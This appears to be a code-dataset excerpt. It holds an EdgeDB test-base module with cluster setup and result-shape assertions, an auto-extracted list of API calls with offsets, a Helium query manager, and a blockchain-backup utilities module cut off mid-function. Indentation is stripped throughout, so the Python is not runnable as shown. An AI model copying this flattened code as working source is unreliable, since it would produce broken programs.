if methname in ns:
del ns[methname]
mcls.add_method(methname, ns, meth)
cls = super().__new__(mcls, name, bases, ns)
if not ns.get('BASE_TEST_CLASS') and hasattr(cls, 'get_database_name'):
dbname = cls.get_database_name()
if name in mcls._database_names:
raise TypeError(
f'{name} wants duplicate database name: {dbname}')
mcls._database_names.add(name)
return cls
class TestCase(unittest.TestCase, metaclass=TestCaseMeta):
@classmethod
def setUpClass(cls):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
cls.loop = loop
@classmethod
def tearDownClass(cls):
cls.loop.close()
asyncio.set_event_loop(None)
def add_fail_notes(self, **kwargs):
if not hasattr(self, 'fail_notes'):
self.fail_notes = {}
self.fail_notes.update(kwargs)
@contextlib.contextmanager
def annotate(self, **kwargs):
# Annotate the test in case the nested block of code fails.
try:
yield
except Exception:
self.add_fail_notes(**kwargs)
raise
@contextlib.contextmanager
def assertRaisesRegex(self, exception, regex, msg=None,
**kwargs):
with super().assertRaisesRegex(exception, regex, msg=msg):
try:
yield
except BaseException as e:
if isinstance(e, exception):
for attr_name, expected_val in kwargs.items():
val = getattr(e, attr_name)
if val != expected_val:
raise self.failureException(
f'{exception.__name__} context attribute '
f'{attr_name!r} is {val} (expected '
f'{expected_val!r})') from e
raise
_default_cluster = None
def _init_cluster(data_dir=None, *, cleanup_atexit=True, init_settings=None):
if init_settings is None:
init_settings = {}
if (not os.environ.get('EDGEDB_DEBUG_SERVER') and
not os.environ.get('EDGEDB_LOG_LEVEL')):
_env = {'EDGEDB_LOG_LEVEL': 'silent'}
else:
_env = {}
if data_dir is None:
cluster = edgedb_cluster.TempCluster(env=_env, testmode=True)
destroy = True
else:
cluster = edgedb_cluster.Cluster(data_dir=data_dir, env=_env)
destroy = False
if cluster.get_status() == 'not-initialized':
cluster.init(server_settings=init_settings)
cluster.start(port='dynamic')
cluster.set_superuser_password('<PASSWORD>')
if cleanup_atexit:
atexit.register(_shutdown_cluster, cluster, destroy=destroy)
return cluster
def _start_cluster(*, cleanup_atexit=True):
global _default_cluster
if _default_cluster is None:
cluster_addr = os.environ.get('EDGEDB_TEST_CLUSTER_ADDR')
if cluster_addr:
conn_spec = json.loads(cluster_addr)
_default_cluster = edgedb_cluster.RunningCluster(**conn_spec)
else:
data_dir = os.environ.get('EDGEDB_TEST_DATA_DIR')
_default_cluster = _init_cluster(
data_dir=data_dir, cleanup_atexit=cleanup_atexit)
return _default_cluster
def _shutdown_cluster(cluster, *, destroy=True):
global _default_cluster
_default_cluster = None
if cluster is not None:
cluster.stop()
if destroy:
cluster.destroy()
class ClusterTestCase(TestCase):
BASE_TEST_CLASS = True
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.cluster = _start_cluster(cleanup_atexit=True)
class RollbackChanges:
def __init__(self, test):
self._conn = test.con
async def __aenter__(self):
self._tx = self._conn.transaction()
await self._tx.start()
async def __aexit__(self, exc_type, exc, tb):
await self._tx.rollback()
class ConnectedTestCaseMixin:
@classmethod
async def connect(cls, *,
cluster=None,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
user=edgedb_defines.EDGEDB_SUPERUSER,
password='<PASSWORD>'):
conargs = cls.get_connect_args(
cluster=cluster, database=database, user=user, password=password)
return await edgedb.async_connect(**conargs)
@classmethod
def get_connect_args(cls, *,
cluster=None,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
user=edgedb_defines.EDGEDB_SUPERUSER,
password='<PASSWORD>'):
if cluster is None:
cluster = cls.cluster
conargs = cluster.get_connect_args().copy()
conargs.update(dict(user=user,
password=password,
database=database))
return conargs
def _run_and_rollback(self):
return RollbackChanges(self)
async def assert_query_result(self, query,
exp_result_json,
exp_result_binary=...,
*,
msg=None, sort=None):
try:
tx = self.con.transaction()
await tx.start()
try:
res = await self.con.fetchall_json(query)
finally:
await tx.rollback()
res = json.loads(res)
if sort is not None:
self._sort_results(res, sort)
self._assert_data_shape(res, exp_result_json, message=msg)
except Exception:
self.add_fail_notes(serialization='json')
raise
if exp_result_binary is ...:
# The expected result is the same
exp_result_binary = exp_result_json
try:
res = await self.con.fetchall(query)
res = serutils.serialize(res)
if sort is not None:
self._sort_results(res, sort)
self._assert_data_shape(res, exp_result_binary, message=msg)
except Exception:
self.add_fail_notes(serialization='binary')
raise
def _sort_results(self, results, sort):
if sort is True:
sort = lambda x: x
# don't bother sorting empty things
if results:
# sort can be either a key function or a dict
if isinstance(sort, dict):
# the keys in the dict indicate the fields that
# actually must be sorted
for key, val in sort.items():
# '.' is a special key referring to the base object
if key == '.':
self._sort_results(results, val)
else:
if isinstance(results, list):
for r in results:
self._sort_results(r[key], val)
else:
self._sort_results(results[key], val)
else:
results.sort(key=sort)
def _assert_data_shape(self, data, shape, message=None):
_void = object()
def _format_path(path):
if path:
return 'PATH: ' + ''.join(str(p) for p in path)
else:
return 'PATH: <top-level>'
def _assert_type_shape(path, data, shape):
if shape in (int, float):
if not isinstance(data, shape):
self.fail(
f'{message}: expected {shape}, got {data!r} '
f'{_format_path(path)}')
else:
try:
shape(data)
except (ValueError, TypeError):
self.fail(
f'{message}: expected {shape}, got {data!r} '
f'{_format_path(path)}')
def _assert_dict_shape(path, data, shape):
for sk, sv in shape.items():
if not data or sk not in data:
self.fail(
f'{message}: key {sk!r} '
f'is missing\n{pprint.pformat(data)} '
f'{_format_path(path)}')
_assert_generic_shape(path + (f'["{sk}"]',), data[sk], sv)
def _list_shape_iter(shape):
last_shape = _void
for item in shape:
if item is Ellipsis:
if last_shape is _void:
raise ValueError(
'invalid shape spec: Ellipsis cannot be the'
'first element')
while True:
yield last_shape
last_shape = item
yield item
def _assert_list_shape(path, data, shape):
if not isinstance(data, list):
self.fail(
f'{message}: expected list '
f'{_format_path(path)}')
if not data and shape:
self.fail(
f'{message}: expected non-empty list '
f'{_format_path(path)}')
shape_iter = _list_shape_iter(shape)
_data_count = 0
for _data_count, el in enumerate(data):
try:
el_shape = next(shape_iter)
except StopIteration:
self.fail(
f'{message}: unexpected trailing elements in list '
f'{_format_path(path)}')
_assert_generic_shape(
path + (f'[{_data_count}]',),
el,
el_shape)
if len(shape) > _data_count + 1:
if shape[_data_count + 1] is not Ellipsis:
self.fail(
f'{message}: expecting more elements in list '
f'{_format_path(path)}')
def _assert_set_shape(path, data, shape):
if not isinstance(data, (list, set)):
self.fail(
f'{message}: expected list or set '
f'{_format_path(path)}')
if not data and shape:
self.fail(
f'{message}: expected non-empty set '
f'{_format_path(path)}')
shape_iter = _list_shape_iter(sorted(shape))
_data_count = 0
for _data_count, el in enumerate(sorted(data)):
try:
el_shape = next(shape_iter)
except StopIteration:
self.fail(
f'{message}: unexpected trailing elements in set '
f'[path {_format_path(path)}]')
_assert_generic_shape(
path + (f'{{{_data_count}}}',), el, el_shape)
if len(shape) > _data_count + 1:
if Ellipsis not in shape:
self.fail(
f'{message}: expecting more elements in set '
f'{_format_path(path)}')
def _assert_generic_shape(path, data, shape):
if isinstance(shape, nullable):
if data is None:
return
else:
shape = shape.value
if isinstance(shape, list):
return _assert_list_shape(path, data, shape)
elif isinstance(shape, set):
return _assert_set_shape(path, data, shape)
elif isinstance(shape, dict):
return _assert_dict_shape(path, data, shape)
elif isinstance(shape, type):
return _assert_type_shape(path, data, shape)
elif isinstance(shape, float):
if not math.isclose(data, shape, rel_tol=1e-04):
self.fail(
f'{message}: not isclose({data}, {shape}) '
f'{_format_path(path)}')
elif isinstance(shape, uuid.UUID):
# since the data comes from JSON, it will only have a str
if data != str(shape):
self.fail(
f'{message}: {data!r} != {shape!r} '
f'{_format_path(path)}')
elif isinstance(shape, (str, int, timedelta, decimal.Decimal)):
if data != shape:
self.fail(
f'{message}: {data!r} != {shape!r} '
f'{_format_path(path)}')
elif shape is None:
if data is not None:
self.fail(
f'{message}: {data!r} is expected to be None '
f'{_format_path(path)}')
else:
raise ValueError(f'unsupported shape type {shape}')
message = message or 'data shape differs'
return _assert_generic_shape((), data, shape)
class CLITestCaseMixin:
def run_cli(self, *args, input=None):
conn_args = self.get_connect_args()
cmd_args = (
'--host', conn_args['host'],
'--port', conn_args['port'],
'--user', conn_args['user'],
) + args
if conn_args['password']:
cmd_args = ('--password-from-stdin',) + cmd_args
if input is not None:
input = f"{conn_args['password']}\n{input}"
else:
input = f"{conn_args['password']}\n"
runner = click.testing.CliRunner()
return runner.invoke(
cli.cli, args=cmd_args, input=input,
catch_exceptions=False)
class ConnectedTestCase(ClusterTestCase, ConnectedTestCaseMixin):
BASE_TEST_CLASS = True
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.con = cls.loop.run_until_complete(cls.connect())
@classmethod
def tearDownClass(cls):
try:
cls.loop.run_until_complete(cls.con.aclose())
# Give event loop another iteration so that connection
# transport has a chance to properly close.
cls.loop.run_until_complete(asyncio.sleep(0))
cls.con = None
finally:
super().tearDownClass()
class DatabaseTestCase(ClusterTestCase, ConnectedTestCaseMixin):
SETUP = None
TEARDOWN = None
SCHEMA = None
SETUP_METHOD = None
TEARDOWN_METHOD = None
# Some tests may want to manage transactions manually,
# in which case ISOLATED_METHODS will be False.
ISOLATED_METHODS = True
# Turns on "EdgeDB developer" mode which allows using restricted
# syntax like USING SQL and similar. It allows modifying standard
# library (e.g. declaring casts).
INTERNAL_TESTMODE = True
BASE_TEST_CLASS = True
def setUp(self):
if self.INTERNAL_TESTMODE:
self.loop.run_until_complete(
self.con.execute(
'CONFIGURE SESSION SET __internal_testmode := true;'))
if self.ISOLATED_METHODS:
self.xact = self.con.transaction()
self.loop.run_until_complete(self.xact.start())
if self.SETUP_METHOD:
self.loop.run_until_complete(
self.con.execute(self.SETUP_METHOD))
super().setUp()
def tearDown(self):
try:
if self.TEARDOWN_METHOD:
self.loop.run_until_complete(
self.con.execute(self.TEARDOWN_METHOD))
finally:
try:
if self.ISOLATED_METHODS:
self.loop.run_until_complete(self.xact.rollback())
del self.xact
if self.con.is_in_transaction():
self.loop.run_until_complete(
self.con.execute('ROLLBACK'))
raise AssertionError(
'test connection is still in transaction '
'*after* the test')
if not self.ISOLATED_METHODS:
self.loop.run_until_complete(
self.con.execute('RESET ALIAS *;'))
finally:
super().tearDown()
@classmethod
def setUpClass(cls):
super().setUpClass()
dbname = cls.get_database_name()
cls.admin_conn = None
cls.con = None
class_set_up = os.environ.get('EDGEDB_TEST_CASES_SET_UP')
# Only open an extra admin connection if necessary.
if not class_set_up:
script = f'CREATE DATABASE {dbname};'
cls.admin_conn = cls.loop.run_until_complete(cls.connect())
cls.loop.run_until_complete(cls.admin_conn.execute(script))
cls.con = cls.loop.run_until_complete(cls.connect(database=dbname))
if not class_set_up:
script = cls.get_setup_script()
if script:
cls.loop.run_until_complete(cls.con.execute(script))
@classmethod
def get_database_name(cls):
if cls.__name__.startswith('TestEdgeQL'):
dbname = cls.__name__[len('TestEdgeQL'):]
elif cls.__name__.startswith('Test'):
dbname = cls.__name__[len('Test'):]
else:
dbname = cls.__name__
return dbname.lower()
@classmethod
def get_setup_script(cls):
script = ''
# allow the setup script to also run in test mode
if cls.INTERNAL_TESTMODE:
script += '\nCONFIGURE SESSION SET __internal_testmode := true;'
# Look at all SCHEMA entries and potentially create multiple
# modules, but always create the 'test' module.
schema = ['\nmodule test {}']
for name, val in cls.__dict__.items():
m = re.match(r'^SCHEMA(?:_(\w+))?', name)
if m:
module_name = (m.group(1) or 'test').lower().replace(
'__', '.')
with open(val, 'r') as sf:
module = sf.read()
schema.append(f'\nmodule {module_name} {{ {module} }}')
script += f'\nCREATE MIGRATION test_migration'
script += f' TO {{ {"".join(schema)} }};'
script += f'\nCOMMIT MIGRATION test_migration;'
if cls.SETUP:
if not isinstance(cls.SETUP, (list, tuple)):
scripts = [cls.SETUP]
else:
scripts = cls.SETUP
for scr in scripts:
if '\n' not in scr and os.path.exists(scr):
with open(scr, 'rt') as f:
setup = f.read()
else:
setup = scr
script += '\n' + setup
# allow the setup script to also run in test mode
if cls.INTERNAL_TESTMODE:
script += '\nCONFIGURE SESSION SET __internal_testmode := false;'
return script.strip(' \n')
@classmethod
def tearDownClass(cls):
script = ''
class_set_up = os.environ.get('EDGEDB_TEST_CASES_SET_UP')
if cls.TEARDOWN and not class_set_up:
script = cls.TEARDOWN.strip()
try:
if script:
cls.loop.run_until_complete(
cls.con.execute(script))
finally:
try:
cls.loop.run_until_complete(cls.con.aclose())
if not class_set_up:
dbname = cls.get_database_name()
script = f'DROP DATABASE {dbname};'
cls.loop.run_until_complete(
cls.admin_conn.execute(script))
finally:
try:
if cls.admin_conn is not None:
cls.loop.run_until_complete(
cls.admin_conn.aclose())
finally:
super().tearDownClass()
@contextlib.asynccontextmanager
async def assertRaisesRegexTx(self, exception, regex, msg=None, **kwargs):
"""A version of assertRaisesRegex with automatic transaction recovery
"""
with super().assertRaisesRegex(exception, regex, msg=msg):
try:
tx = self.con.transaction()
await tx.start()
yield
except BaseException as e:
if isinstance(e, exception):
for attr_name, expected_val in kwargs.items():
val = getattr(e, attr_name)
if val != expected_val:
raise self.failureException(
f'{exception.__name__} context attribute '
f'{attr_name!r} is {val} (expected '
f'{expected_val!r})') from e
raise
finally:
await tx.rollback()
class nullable:
def __init__(self, value):
self.value = value
class Error:
def __init__(self, cls, message, shape):
self._message = message
self._class = cls
self._shape = shape
@property
def message(self):
return self._message
@property
def cls(self):
return self._class
@property
def shape(self):
return self._shape
class BaseQueryTestCase(DatabaseTestCase):
BASE_TEST_CLASS = True
class DDLTestCase(BaseQueryTestCase):
# DDL test cases generally need to be serialized
# to avoid deadlocks in parallel execution.
SERIALIZED = True
class NonIsolatedDDLTestCase(DDLTestCase):
ISOLATED_METHODS = False
BASE_TEST_CLASS = True
class QueryTestCase(BaseQueryTestCase):
BASE_TEST_CLASS = True
def get_test_cases_setup(cases):
result = []
for case in cases:
if not hasattr(case, 'get_setup_script'):
continue
setup_script = case.get_setup_script()
if not setup_script:
continue
dbname = case.get_database_name()
result.append((case, dbname, setup_script))
return result
def setup_test_cases(cases, conn, num_jobs):
setup = get_test_cases_setup(cases)
async def _run():
if num_jobs == 1:
# Special case for --jobs=1
for _case, dbname, setup_script in setup:
await _setup_database(dbname, setup_script, conn)
else:
async with taskgroup.TaskGroup(name='setup test cases') as g:
# Use a semaphore to limit the concurrency of bootstrap
# tasks to the number of jobs (bootstrap is heavy, having
# more tasks than `--jobs` won't necessarily make
# things faster.)
sem = asyncio.BoundedSemaphore(num_jobs)
async def controller(coro, *args):
async with sem:
await coro(*args)
for _case, dbname, setup_script in setup:
g.create_task(controller(
_setup_database, dbname, setup_script, conn))
return asyncio.run(_run())
async def _setup_database(dbname, setup_script, conn_args):
default_args = {
'user': edgedb_defines.EDGEDB_SUPERUSER,
'password': '<PASSWORD>',
}
default_args.update(conn_args)
admin_conn = await edgedb.async_connect(
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
**default_args)
try:
await admin_conn.execute(f'CREATE DATABASE {dbname};')
finally:
await admin_conn.aclose()
dbconn = await edgedb.async_connect(database=dbname, **default_args)
try:
async with dbconn.transaction():
await dbconn.execute(setup_script)
finally:
await dbconn.aclose()
return dbname
_lock_cnt = 0
def gen_lock_key():
global _lock_cnt
_lock_cnt += 1
return os.getpid() * 1000 + _lock_cnt
| [
"asyncio.BoundedSemaphore",
"edb.testbase.serutils.serialize",
"edb.server.cluster.Cluster",
"edb.server.cluster.RunningCluster",
"edgedb.async_connect",
"os.path.exists",
"asyncio.new_event_loop",
"functools.wraps",
"os.getpid",
"asyncio.sleep",
"atexit.register",
"collections.OrderedDict",
... | [((1214, 1239), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (1237, 1239), False, 'import collections\n'), ((2324, 2345), 'functools.wraps', 'functools.wraps', (['meth'], {}), '(meth)\n', (2339, 2345), False, 'import functools\n'), ((4046, 4070), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (4068, 4070), False, 'import asyncio\n'), ((4079, 4107), 'asyncio.set_event_loop', 'asyncio.set_event_loop', (['loop'], {}), '(loop)\n', (4101, 4107), False, 'import asyncio\n'), ((4211, 4239), 'asyncio.set_event_loop', 'asyncio.set_event_loop', (['None'], {}), '(None)\n', (4233, 4239), False, 'import asyncio\n'), ((5806, 5857), 'edb.server.cluster.TempCluster', 'edgedb_cluster.TempCluster', ([], {'env': '_env', 'testmode': '(True)'}), '(env=_env, testmode=True)\n', (5832, 5857), True, 'from edb.server import cluster as edgedb_cluster\n'), ((5909, 5960), 'edb.server.cluster.Cluster', 'edgedb_cluster.Cluster', ([], {'data_dir': 'data_dir', 'env': '_env'}), '(data_dir=data_dir, env=_env)\n', (5931, 5960), True, 'from edb.server import cluster as edgedb_cluster\n'), ((6204, 6264), 'atexit.register', 'atexit.register', (['_shutdown_cluster', 'cluster'], {'destroy': 'destroy'}), '(_shutdown_cluster, cluster, destroy=destroy)\n', (6219, 6264), False, 'import atexit\n'), ((6416, 6458), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_TEST_CLUSTER_ADDR"""'], {}), "('EDGEDB_TEST_CLUSTER_ADDR')\n", (6430, 6458), False, 'import os\n'), ((20051, 20093), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_TEST_CASES_SET_UP"""'], {}), "('EDGEDB_TEST_CASES_SET_UP')\n", (20065, 20093), False, 'import os\n'), ((22633, 22675), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_TEST_CASES_SET_UP"""'], {}), "('EDGEDB_TEST_CASES_SET_UP')\n", (22647, 22675), False, 'import os\n'), ((26927, 27013), 'edgedb.async_connect', 'edgedb.async_connect', ([], {'database': 'edgedb_defines.EDGEDB_SUPERUSER_DB'}), '(database=edgedb_defines.EDGEDB_SUPERUSER_DB, **\n default_args)\n', (26947, 27013), False, 'import edgedb\n'), ((27166, 27219), 'edgedb.async_connect', 'edgedb.async_connect', ([], {'database': 'dbname'}), '(database=dbname, **default_args)\n', (27186, 27219), False, 'import edgedb\n'), ((5593, 5630), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_DEBUG_SERVER"""'], {}), "('EDGEDB_DEBUG_SERVER')\n", (5607, 5630), False, 'import os\n'), ((5651, 5685), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_LOG_LEVEL"""'], {}), "('EDGEDB_LOG_LEVEL')\n", (5665, 5685), False, 'import os\n'), ((6508, 6532), 'json.loads', 'json.loads', (['cluster_addr'], {}), '(cluster_addr)\n', (6518, 6532), False, 'import json\n'), ((6564, 6606), 'edb.server.cluster.RunningCluster', 'edgedb_cluster.RunningCluster', ([], {}), '(**conn_spec)\n', (6593, 6606), True, 'from edb.server import cluster as edgedb_cluster\n'), ((6644, 6682), 'os.environ.get', 'os.environ.get', (['"""EDGEDB_TEST_DATA_DIR"""'], {}), "('EDGEDB_TEST_DATA_DIR')\n", (6658, 6682), False, 'import os\n'), ((7931, 7962), 'edgedb.async_connect', 'edgedb.async_connect', ([], {}), '(**conargs)\n', (7951, 7962), False, 'import edgedb\n'), ((9059, 9074), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (9069, 9074), False, 'import json\n'), ((9536, 9559), 'edb.testbase.serutils.serialize', 'serutils.serialize', (['res'], {}), '(res)\n', (9554, 9559), False, 'from edb.testbase import serutils\n'), ((21414, 21451), 're.match', 're.match', (['"""^SCHEMA(?:_(\\\\w+))?"""', 'name'], {}), "('^SCHEMA(?:_(\\\\w+))?', name)\n", (21422, 21451), False, 'import re\n'), ((27468, 27479), 'os.getpid', 'os.getpid', ([], {}), '()\n', (27477, 27479), False, 'import os\n'), ((2177, 2210), 'inspect.iscoroutinefunction', 'inspect.iscoroutinefunction', (['meth'], {}), '(meth)\n', (2204, 2210), False, 'import inspect\n'), ((17830, 17846), 'asyncio.sleep', 'asyncio.sleep', (['(0)'], {}), '(0)\n', (17843, 17846), False, 'import asyncio\n'), ((26004, 26048), 'edb.common.taskgroup.TaskGroup', 'taskgroup.TaskGroup', ([], {'name': '"""setup test cases"""'}), "(name='setup test cases')\n", (26023, 26048), False, 'from edb.common import taskgroup\n'), ((26323, 26357), 'asyncio.BoundedSemaphore', 'asyncio.BoundedSemaphore', (['num_jobs'], {}), '(num_jobs)\n', (26347, 26357), False, 'import asyncio\n'), ((1938, 1971), 'inspect.iscoroutinefunction', 'inspect.iscoroutinefunction', (['meth'], {}), '(meth)\n', (1965, 1971), False, 'import inspect\n'), ((22133, 22152), 'os.path.exists', 'os.path.exists', (['scr'], {}), '(scr)\n', (22147, 22152), False, 'import os\n'), ((11817, 11837), 'pprint.pformat', 'pprint.pformat', (['data'], {}), '(data)\n', (11831, 11837), False, 'import pprint\n'), ((15473, 15514), 'math.isclose', 'math.isclose', (['data', 'shape'], {'rel_tol': '(0.0001)'}), '(data, shape, rel_tol=0.0001)\n', (15485, 15514), False, 'import math\n')] |
import logging
from helium.common.managers.basemanager import BaseManager, BaseQuerySet
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
logger = logging.getLogger(__name__)
class EventQuerySet(BaseQuerySet):
def exists_for_user(self, id, user_id):
return self.filter(pk=id, user_id=user_id).exists()
def for_user(self, user_id):
return self.filter(user_id=user_id)
class EventManager(BaseManager):
def get_queryset(self):
return EventQuerySet(self.model, using=self._db)
def exists_for_user(self, id, user_id):
return self.get_queryset().exists_for_user(id, user_id)
def for_user(self, user_id):
return self.get_queryset().for_user(user_id)
| [
"logging.getLogger"
] | [((190, 217), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (207, 217), False, 'import logging\n')] |
'''
Utilities for blockchain backup.
Copyright 2018-2020 DeNova
Last modified: 2020-12-08
'''
import json
import os
from datetime import timedelta
from traceback import format_exc
from django.utils.timezone import now
from blockchain_backup import __file__ as blockchain_backup_file
from blockchain_backup.bitcoin import constants, state
from blockchain_backup.core_version import CORE_VERSION
from blockchain_backup.settings import CONNECTION_HEARTBEAT, USE_SOCKETIO
from denova.os.command import background, run
from denova.os.osid import is_windows
from denova.os.process import get_path, is_program_running
from denova.os.user import whoami
from denova.python.log import get_log
from denova.python.times import seconds_human_readable
log = get_log()
def bitcoin_qt():
'''
Name of bitcoin-qt program.
>>> bitcoin_qt()
'bitcoin-qt'
'''
program = 'bitcoin-qt'
if is_windows():
program += '.exe'
return program
def bitcoin_cli():
'''
Name of bitcoin-cli program.
>>> bitcoin_cli()
'bitcoin-cli'
'''
program = 'bitcoin-cli'
if is_windows():
program += '.exe'
return program
def bitcoind():
'''
Name of bitcoind program.
>>> bitcoind()
'bitcoind'
'''
program = 'bitcoind'
if is_windows():
program += '.exe'
return program
def bitcoin_tx():
'''
Name of bitcoin-tx program.
>>> bitcoin_tx()
'bitcoin-tx'
'''
program = 'bitcoin-tx'
if is_windows():
program += '.exe'
return program
def is_bitcoind_running():
'''
Return True if program is running.
>>> is_bitcoind_running()
False
'''
return is_program_running(bitcoind())
def is_bitcoin_qt_running():
'''
Return True if program is running.
>>> is_bitcoin_qt_running()
False
'''
return is_program_running(bitcoin_qt())
def is_bitcoin_tx_running():
'''
Return True if program is running.
>>> is_bitcoin_tx_running()
False
'''
return is_program_running(bitcoin_tx())
def is_bitcoin_core_running():
'''
Return True if any of the
bitcoin core programs are running.
>>> is_bitcoin_core_running()
False
'''
return (is_bitcoind_running() or
is_bitcoin_qt_running() or
is_bitcoin_tx_running())
def is_backup_running():
'''
Return True if backup is running.
>>> is_backup_running()
False
'''
# backup program is a link to safecopy
return is_program_running(constants.BACKUP_PROGRAM)
def is_restore_running():
'''
Return True if restore is running.
>>> is_restore_running()
False
'''
# restore program is a link to safecopy
return is_program_running(constants.RESTORE_PROGRAM)
def get_bitcoin_bin_dir():
''' Return bitcoin bin dir, or None if bitcoin not running.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> path = get_bitcoin_bin_dir()
>>> (path is None) or ('bitcoin' in path)
True
'''
path = None
for program in [bitcoin_qt(), bitcoin_tx(), bitcoind()]:
if path is None:
path = get_path(program)
if path:
bindir = os.path.dirname(path)
else:
bindir = None
return bindir
def get_bitcoin_version():
'''
Get the version of bitcoin core.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_bitcoin_version()
'0.20.1'
'''
from blockchain_backup.bitcoin.preferences import get_bin_dir
bitcoin_core_version = CORE_VERSION
try:
VERSION_PREFIX = ' version v'
command_args = []
bin_dir = get_bin_dir()
if bin_dir is None:
command_args.append(bitcoind())
else:
command_args.append(os.path.join(bin_dir, bitcoind()))
command_args.append('--version')
result = run(*command_args)
i = result.stdout.find('\n')
if i > 0:
stdout = result.stdout[:i]
else:
stdout = result.stdout
i = stdout.find(VERSION_PREFIX)
if i > 0:
bitcoin_core_version = stdout[i + len(VERSION_PREFIX):]
log(f'bitcoin core version: {bitcoin_core_version}')
else:
log(f'unable to find version; stdout: {stdout}')
except FileNotFoundError:
log(f'FileNotFoundError: {command_args}')
except PermissionError:
log(f'PermissionError: {command_args}')
except: # 'bare except' because it catches more than "except Exception"
log('unable to get bitcoin core version: {command_args}')
return bitcoin_core_version
def get_blockchain_context():
'''
Get the basic context for a blockchain web page.
>>> context = get_blockchain_context()
>>> context['update_facility']
'denova.blockchain_backup.bitcoin'
>>> context['update_type']
'blockchain_socketio_type'
>>> context['connection_heartbeat']
'--heartbeat--'
'''
context = {'update_facility': constants.BLOCKCHAIN_FACILITY,
'update_type': constants.BLOCKCHAIN_TYPE,
'update_interval': '1000',
'connection_heartbeat': CONNECTION_HEARTBEAT,
}
return context
def get_excluded_files():
'''
Get the files to exclude from backups and restores.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_excluded_files()
'wallets,wallet.dat,.walletlock,backups,blockchain_backup_database'
'''
from blockchain_backup.bitcoin.preferences import get_extra_args
excluded_files = 'wallets,wallet.dat,.walletlock,backups,{}'.format(
constants.BLOCKCHAIN_BACKUP_DB_DIR)
use_test_net = constants.TESTNET_FLAG in get_extra_args()
if not use_test_net:
excluded_files += f',{constants.TEST_NET_DIR}'
# add the subdirectory of the backup if its in the data directory
backup_subdir = get_backup_subdir()
if backup_subdir is not None and backup_subdir not in excluded_files:
excluded_files += f',{backup_subdir}'
return excluded_files
def get_backup_subdir():
'''
Get subdir name if its in the data directory.
>>> from blockchain_backup.bitcoin.preferences import get_preferences, save_preferences
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_backup_subdir()
'backups'
>>> prefs = get_preferences()
>>> prefs.backup_dir = '/tmp/bitcoin/backups'
>>> save_preferences(prefs)
>>> get_backup_subdir() is None
True
'''
from blockchain_backup.bitcoin.preferences import get_backup_dir, get_data_dir
data_dir = get_data_dir()
backup_dir = get_backup_dir()
# get the name of the subdirectory of the backup
# if its in the data directory
index = backup_dir.find(data_dir)
if index >= 0:
backup_subdir = backup_dir[index + len(data_dir):]
if backup_subdir.startswith(os.sep):
backup_subdir = backup_subdir[1:]
if backup_subdir.endswith(os.sep):
backup_subdir = backup_subdir[:-1]
else:
backup_subdir = None
return backup_subdir
def get_fresh_debug_log(data_dir):
'''
Get the debug log name and
clear it so all entries are from
the new session.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_fresh_debug_log('/tmp/bitcoin/data/testnet3')
'/tmp/bitcoin/data/testnet3/debug.log'
'''
debug_log_name = get_debug_log_name(data_dir)
if os.path.exists(debug_log_name):
os.remove(debug_log_name)
return debug_log_name
def get_debug_log_name(data_dir):
'''
Get the debug log name.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_debug_log_name('/tmp/bitcoin/data')
'/tmp/bitcoin/data/debug.log'
>>> get_debug_log_name('/tmp/bitcoin/data/testnet3')
'/tmp/bitcoin/data/testnet3/debug.log'
'''
debug_log_name = os.path.join(data_dir, constants.DEBUG_LOG)
return debug_log_name
def strip_testnet_from_data_dir(data_dir=None):
'''
Get the data dirname without
the "testnet3" subdir, if appropriate.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> strip_testnet_from_data_dir()
'/tmp/bitcoin/data'
'''
from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args
if data_dir is None:
data_dir = get_data_dir()
use_test_net = constants.TESTNET_FLAG in get_extra_args()
if use_test_net and data_dir.endswith(constants.TEST_NET_SUBDIR):
new_data_dir = data_dir[:data_dir.rfind(constants.TEST_NET_SUBDIR)]
else:
new_data_dir = data_dir
return new_data_dir
def send_socketio_message(key, html):
'''
Send a message to the user via socketio.
>>> key = 'button'
>>> html = 'Test'
>>> send_socketio_message(key, html)
'''
if USE_SOCKETIO:
try:
update = json.dumps({f'{key}_html': html})
log(f'socketio update: {update}')
#socketio_message = {'type': constants.BLOCKCHAIN_TYPE,
# 'server_nonce': server_nonce(),
# 'update': update,
# 'update_time': format_time(str(now())),
# }
#redis_message = RedisMessage(json.dumps(socketio_message))
#RedisPublisher(facility=constants.BLOCKCHAIN_FACILITY,
# broadcast=True).publish_message(redis_message)
except ConnectionRefusedError as cre:
log(str(cre))
except Exception as e:
log(str(e))
def is_dir_writeable(data_dir):
'''
Return True if a new file
can be created in the dir.
>>> data_dir = '/tmp'
>>> is_dir_writeable(data_dir)
(True, None)
>>> data_dir = '/'
>>> ok, error_message = is_dir_writeable(data_dir)
>>> ok == False
True
>>> error_message.startswith('Unable to write to the data dir')
True
>>> data_dir = '/unknown'
>>> is_dir_writeable(data_dir)
(False, '"/unknown" directory does not exist.')
'''
try:
filename = os.path.join(data_dir, '.test')
with open(filename, "wt") as output_file:
output_file.write('test')
os.remove(filename)
ok = True
error = None
except PermissionError:
ok = False
